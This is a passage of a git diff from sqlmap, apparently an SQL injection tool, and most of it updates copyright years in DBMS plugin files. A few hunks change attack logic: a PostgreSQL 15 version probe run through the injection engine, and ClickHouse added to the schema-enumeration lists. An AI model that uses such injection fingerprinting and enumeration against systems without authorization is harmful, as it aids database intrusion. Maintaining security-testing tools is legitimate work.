+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/oracle/connector.py b/plugins/dbms/oracle/connector.py
index 02f4db24f..18a70076c 100644
--- a/plugins/dbms/oracle/connector.py
+++ b/plugins/dbms/oracle/connector.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/oracle/enumeration.py b/plugins/dbms/oracle/enumeration.py
index eac989b59..038fe84a7 100644
--- a/plugins/dbms/oracle/enumeration.py
+++ b/plugins/dbms/oracle/enumeration.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/oracle/filesystem.py b/plugins/dbms/oracle/filesystem.py
index d4348b397..d0df7efac 100644
--- a/plugins/dbms/oracle/filesystem.py
+++ b/plugins/dbms/oracle/filesystem.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/oracle/fingerprint.py b/plugins/dbms/oracle/fingerprint.py
index 5b9061cb5..370d45408 100644
--- a/plugins/dbms/oracle/fingerprint.py
+++ b/plugins/dbms/oracle/fingerprint.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/oracle/syntax.py b/plugins/dbms/oracle/syntax.py
index 3c3888d39..789a59bce 100644
--- a/plugins/dbms/oracle/syntax.py
+++ b/plugins/dbms/oracle/syntax.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/oracle/takeover.py b/plugins/dbms/oracle/takeover.py
index 2b5ddd4c9..44aa5bfd9 100644
--- a/plugins/dbms/oracle/takeover.py
+++ b/plugins/dbms/oracle/takeover.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/postgresql/__init__.py b/plugins/dbms/postgresql/__init__.py
index 8f4344c25..b27b9463b 100644
--- a/plugins/dbms/postgresql/__init__.py
+++ b/plugins/dbms/postgresql/__init__.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/postgresql/connector.py b/plugins/dbms/postgresql/connector.py
index 2b9b77829..15a2b48e3 100644
--- a/plugins/dbms/postgresql/connector.py
+++ b/plugins/dbms/postgresql/connector.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/postgresql/enumeration.py b/plugins/dbms/postgresql/enumeration.py
index 665d7b939..f3ced4164 100644
--- a/plugins/dbms/postgresql/enumeration.py
+++ b/plugins/dbms/postgresql/enumeration.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/postgresql/filesystem.py b/plugins/dbms/postgresql/filesystem.py
index 24267367d..3f1e0eb36 100644
--- a/plugins/dbms/postgresql/filesystem.py
+++ b/plugins/dbms/postgresql/filesystem.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/postgresql/fingerprint.py b/plugins/dbms/postgresql/fingerprint.py
index 3cbde60eb..e72a38bd7 100644
--- a/plugins/dbms/postgresql/fingerprint.py
+++ b/plugins/dbms/postgresql/fingerprint.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
@@ -131,7 +131,9 @@ class Fingerprint(GenericFingerprint):
infoMsg = "actively fingerprinting %s" % DBMS.PGSQL
logger.info(infoMsg)
- if inject.checkBooleanExpression("BIT_COUNT(NULL) IS NULL"):
+ if inject.checkBooleanExpression("REGEXP_COUNT(NULL,NULL) IS NULL"):
+ Backend.setVersion(">= 15.0")
+ elif inject.checkBooleanExpression("BIT_COUNT(NULL) IS NULL"):
Backend.setVersion(">= 14.0")
elif inject.checkBooleanExpression("GEN_RANDOM_UUID() IS NOT NULL"):
Backend.setVersion(">= 13.0")
diff --git a/plugins/dbms/postgresql/syntax.py b/plugins/dbms/postgresql/syntax.py
index d2217fbd9..face3ba0d 100644
--- a/plugins/dbms/postgresql/syntax.py
+++ b/plugins/dbms/postgresql/syntax.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/postgresql/takeover.py b/plugins/dbms/postgresql/takeover.py
index b4a576a12..1fa684e4a 100644
--- a/plugins/dbms/postgresql/takeover.py
+++ b/plugins/dbms/postgresql/takeover.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/presto/__init__.py b/plugins/dbms/presto/__init__.py
index 234673163..94c74be1b 100644
--- a/plugins/dbms/presto/__init__.py
+++ b/plugins/dbms/presto/__init__.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/presto/connector.py b/plugins/dbms/presto/connector.py
index fbd0cf123..48473ad02 100644
--- a/plugins/dbms/presto/connector.py
+++ b/plugins/dbms/presto/connector.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/presto/enumeration.py b/plugins/dbms/presto/enumeration.py
index 36b10cc31..9dcf092f3 100644
--- a/plugins/dbms/presto/enumeration.py
+++ b/plugins/dbms/presto/enumeration.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/presto/filesystem.py b/plugins/dbms/presto/filesystem.py
index eb712e5ab..676338238 100644
--- a/plugins/dbms/presto/filesystem.py
+++ b/plugins/dbms/presto/filesystem.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/presto/fingerprint.py b/plugins/dbms/presto/fingerprint.py
index f93a877f3..4a531fedb 100644
--- a/plugins/dbms/presto/fingerprint.py
+++ b/plugins/dbms/presto/fingerprint.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/presto/syntax.py b/plugins/dbms/presto/syntax.py
index 51d87d212..b6b6c633d 100644
--- a/plugins/dbms/presto/syntax.py
+++ b/plugins/dbms/presto/syntax.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/presto/takeover.py b/plugins/dbms/presto/takeover.py
index 150a8b68b..bc0758f42 100644
--- a/plugins/dbms/presto/takeover.py
+++ b/plugins/dbms/presto/takeover.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/raima/__init__.py b/plugins/dbms/raima/__init__.py
index 037c91bbe..2843bbabc 100644
--- a/plugins/dbms/raima/__init__.py
+++ b/plugins/dbms/raima/__init__.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/raima/connector.py b/plugins/dbms/raima/connector.py
index 4bb5af688..a095cf8c6 100644
--- a/plugins/dbms/raima/connector.py
+++ b/plugins/dbms/raima/connector.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/raima/enumeration.py b/plugins/dbms/raima/enumeration.py
index ac0d73f09..449dad43c 100644
--- a/plugins/dbms/raima/enumeration.py
+++ b/plugins/dbms/raima/enumeration.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/raima/filesystem.py b/plugins/dbms/raima/filesystem.py
index 3cce1c9aa..d537b09ac 100644
--- a/plugins/dbms/raima/filesystem.py
+++ b/plugins/dbms/raima/filesystem.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/raima/fingerprint.py b/plugins/dbms/raima/fingerprint.py
index 7d5d6a66f..0ed21dbcd 100644
--- a/plugins/dbms/raima/fingerprint.py
+++ b/plugins/dbms/raima/fingerprint.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/raima/syntax.py b/plugins/dbms/raima/syntax.py
index 9bd95ffd2..27a7f0ddf 100644
--- a/plugins/dbms/raima/syntax.py
+++ b/plugins/dbms/raima/syntax.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/raima/takeover.py b/plugins/dbms/raima/takeover.py
index 1d42766f9..e375ddb79 100644
--- a/plugins/dbms/raima/takeover.py
+++ b/plugins/dbms/raima/takeover.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/sqlite/__init__.py b/plugins/dbms/sqlite/__init__.py
index e2f45b123..4695462c7 100644
--- a/plugins/dbms/sqlite/__init__.py
+++ b/plugins/dbms/sqlite/__init__.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/sqlite/connector.py b/plugins/dbms/sqlite/connector.py
index ef5ea1da3..7ec752f7d 100644
--- a/plugins/dbms/sqlite/connector.py
+++ b/plugins/dbms/sqlite/connector.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/sqlite/enumeration.py b/plugins/dbms/sqlite/enumeration.py
index 2e801d7e5..b5a917674 100644
--- a/plugins/dbms/sqlite/enumeration.py
+++ b/plugins/dbms/sqlite/enumeration.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/sqlite/filesystem.py b/plugins/dbms/sqlite/filesystem.py
index ae16394b1..3bbb5ef83 100644
--- a/plugins/dbms/sqlite/filesystem.py
+++ b/plugins/dbms/sqlite/filesystem.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/sqlite/fingerprint.py b/plugins/dbms/sqlite/fingerprint.py
index 24de50c24..b57e788d0 100644
--- a/plugins/dbms/sqlite/fingerprint.py
+++ b/plugins/dbms/sqlite/fingerprint.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/sqlite/syntax.py b/plugins/dbms/sqlite/syntax.py
index 80ef1546c..7e6f4046e 100644
--- a/plugins/dbms/sqlite/syntax.py
+++ b/plugins/dbms/sqlite/syntax.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/sqlite/takeover.py b/plugins/dbms/sqlite/takeover.py
index 8e8eb4a1d..3b96a5c0f 100644
--- a/plugins/dbms/sqlite/takeover.py
+++ b/plugins/dbms/sqlite/takeover.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/sybase/__init__.py b/plugins/dbms/sybase/__init__.py
index 374e53323..dee9b5c95 100644
--- a/plugins/dbms/sybase/__init__.py
+++ b/plugins/dbms/sybase/__init__.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/sybase/connector.py b/plugins/dbms/sybase/connector.py
index bc286b7aa..1514d32e2 100644
--- a/plugins/dbms/sybase/connector.py
+++ b/plugins/dbms/sybase/connector.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/sybase/enumeration.py b/plugins/dbms/sybase/enumeration.py
index dda39514a..9f254c977 100644
--- a/plugins/dbms/sybase/enumeration.py
+++ b/plugins/dbms/sybase/enumeration.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/sybase/filesystem.py b/plugins/dbms/sybase/filesystem.py
index 53ee69cc7..ca60dc49a 100644
--- a/plugins/dbms/sybase/filesystem.py
+++ b/plugins/dbms/sybase/filesystem.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/sybase/fingerprint.py b/plugins/dbms/sybase/fingerprint.py
index c34db3808..c37b8754e 100644
--- a/plugins/dbms/sybase/fingerprint.py
+++ b/plugins/dbms/sybase/fingerprint.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/sybase/syntax.py b/plugins/dbms/sybase/syntax.py
index 66c0af279..1d4b9cf8b 100644
--- a/plugins/dbms/sybase/syntax.py
+++ b/plugins/dbms/sybase/syntax.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/sybase/takeover.py b/plugins/dbms/sybase/takeover.py
index 93935a6e5..931f35a44 100644
--- a/plugins/dbms/sybase/takeover.py
+++ b/plugins/dbms/sybase/takeover.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/vertica/__init__.py b/plugins/dbms/vertica/__init__.py
index a857b5f02..55db33d98 100644
--- a/plugins/dbms/vertica/__init__.py
+++ b/plugins/dbms/vertica/__init__.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/vertica/connector.py b/plugins/dbms/vertica/connector.py
index 0a41e9698..75cf1c161 100644
--- a/plugins/dbms/vertica/connector.py
+++ b/plugins/dbms/vertica/connector.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/vertica/enumeration.py b/plugins/dbms/vertica/enumeration.py
index 33dee4043..fad906764 100644
--- a/plugins/dbms/vertica/enumeration.py
+++ b/plugins/dbms/vertica/enumeration.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/vertica/filesystem.py b/plugins/dbms/vertica/filesystem.py
index 2ff16d48d..bf4d5c5ba 100644
--- a/plugins/dbms/vertica/filesystem.py
+++ b/plugins/dbms/vertica/filesystem.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/vertica/fingerprint.py b/plugins/dbms/vertica/fingerprint.py
index b4666c614..61ae7c781 100644
--- a/plugins/dbms/vertica/fingerprint.py
+++ b/plugins/dbms/vertica/fingerprint.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/vertica/syntax.py b/plugins/dbms/vertica/syntax.py
index 6c78c4026..016cbf724 100644
--- a/plugins/dbms/vertica/syntax.py
+++ b/plugins/dbms/vertica/syntax.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/vertica/takeover.py b/plugins/dbms/vertica/takeover.py
index 2862fe6fa..d65d71769 100644
--- a/plugins/dbms/vertica/takeover.py
+++ b/plugins/dbms/vertica/takeover.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/virtuoso/__init__.py b/plugins/dbms/virtuoso/__init__.py
index 2e115d437..21b2b75fa 100644
--- a/plugins/dbms/virtuoso/__init__.py
+++ b/plugins/dbms/virtuoso/__init__.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/virtuoso/connector.py b/plugins/dbms/virtuoso/connector.py
index abc19bac4..60cd174f6 100644
--- a/plugins/dbms/virtuoso/connector.py
+++ b/plugins/dbms/virtuoso/connector.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/virtuoso/enumeration.py b/plugins/dbms/virtuoso/enumeration.py
index 0b5eca36d..a0434fa0d 100644
--- a/plugins/dbms/virtuoso/enumeration.py
+++ b/plugins/dbms/virtuoso/enumeration.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/virtuoso/filesystem.py b/plugins/dbms/virtuoso/filesystem.py
index b1b0e890b..f4ef54e91 100644
--- a/plugins/dbms/virtuoso/filesystem.py
+++ b/plugins/dbms/virtuoso/filesystem.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/virtuoso/fingerprint.py b/plugins/dbms/virtuoso/fingerprint.py
index e62c26b7c..0ed0bd5dd 100644
--- a/plugins/dbms/virtuoso/fingerprint.py
+++ b/plugins/dbms/virtuoso/fingerprint.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/virtuoso/syntax.py b/plugins/dbms/virtuoso/syntax.py
index 51d87d212..b6b6c633d 100644
--- a/plugins/dbms/virtuoso/syntax.py
+++ b/plugins/dbms/virtuoso/syntax.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/dbms/virtuoso/takeover.py b/plugins/dbms/virtuoso/takeover.py
index a82ef9645..6acd165a9 100644
--- a/plugins/dbms/virtuoso/takeover.py
+++ b/plugins/dbms/virtuoso/takeover.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/generic/__init__.py b/plugins/generic/__init__.py
index a5b83a8fa..8476fab2f 100644
--- a/plugins/generic/__init__.py
+++ b/plugins/generic/__init__.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/generic/connector.py b/plugins/generic/connector.py
index 0375ca428..2512c7f14 100644
--- a/plugins/generic/connector.py
+++ b/plugins/generic/connector.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/generic/custom.py b/plugins/generic/custom.py
index 3002c0da1..fab62615b 100644
--- a/plugins/generic/custom.py
+++ b/plugins/generic/custom.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/plugins/generic/databases.py b/plugins/generic/databases.py
index 32cfe28f0..b924e9980 100644
--- a/plugins/generic/databases.py
+++ b/plugins/generic/databases.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
@@ -83,7 +83,7 @@ class Databases(object):
if not kb.data.currentDb and Backend.isDbms(DBMS.VERTICA):
kb.data.currentDb = VERTICA_DEFAULT_SCHEMA
- if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2, DBMS.PGSQL, DBMS.MONETDB, DBMS.DERBY, DBMS.VERTICA, DBMS.PRESTO, DBMS.MIMERSQL, DBMS.CRATEDB, DBMS.CACHE, DBMS.FRONTBASE):
+ if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2, DBMS.PGSQL, DBMS.MONETDB, DBMS.DERBY, DBMS.VERTICA, DBMS.PRESTO, DBMS.MIMERSQL, DBMS.CRATEDB, DBMS.CACHE, DBMS.FRONTBASE, DBMS.CLICKHOUSE):
warnMsg = "on %s you'll need to use " % Backend.getIdentifiedDbms()
warnMsg += "schema names for enumeration as the counterpart to database "
warnMsg += "names on other DBMSes"
@@ -108,7 +108,7 @@ class Databases(object):
warnMsg += "names will be fetched from 'mysql' database"
logger.warning(warnMsg)
- elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2, DBMS.PGSQL, DBMS.MONETDB, DBMS.DERBY, DBMS.VERTICA, DBMS.PRESTO, DBMS.MIMERSQL, DBMS.CRATEDB, DBMS.CACHE, DBMS.FRONTBASE):
+ elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2, DBMS.PGSQL, DBMS.MONETDB, DBMS.DERBY, DBMS.VERTICA, DBMS.PRESTO, DBMS.MIMERSQL, DBMS.CRATEDB, DBMS.CACHE, DBMS.FRONTBASE, DBMS.CLICKHOUSE):
warnMsg = "schema names are going to be used on %s " % Backend.getIdentifiedDbms()
warnMsg += "for enumeration as the counterpart to database "
warnMsg += "names on other DBMSes"
@@ -621,7 +621,7 @@ class Databases(object):
condQueryStr = "%%s%s" % colCondParam
condQuery = " AND (%s)" % " OR ".join(condQueryStr % (condition, unsafeSQLIdentificatorNaming(col)) for col in sorted(colList))
